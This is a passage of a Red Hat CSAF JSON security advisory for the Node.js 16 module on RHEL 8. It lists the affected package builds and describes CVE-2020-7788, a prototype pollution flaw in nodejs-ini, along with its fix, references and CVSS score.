Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le" }, "product_reference": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x" }, "product_reference": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src" }, "product_reference": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64" }, "product_reference": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64" }, "product_reference": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le" }, "product_reference": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x" }, "product_reference": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64" }, "product_reference": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64" }, "product_reference": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le" }, "product_reference": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x" }, "product_reference": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64" }, "product_reference": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64" }, "product_reference": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le" }, "product_reference": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x" }, "product_reference": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64" }, "product_reference": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch" }, "product_reference": "nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64" }, "product_reference": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le" }, "product_reference": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x" }, "product_reference": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64" }, "product_reference": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch" }, "product_reference": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src" }, "product_reference": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch" }, "product_reference": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src" }, "product_reference": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64" }, "product_reference": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le" }, "product_reference": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x" }, "product_reference": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" }, "product_reference": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T17:21:31+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5171" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ 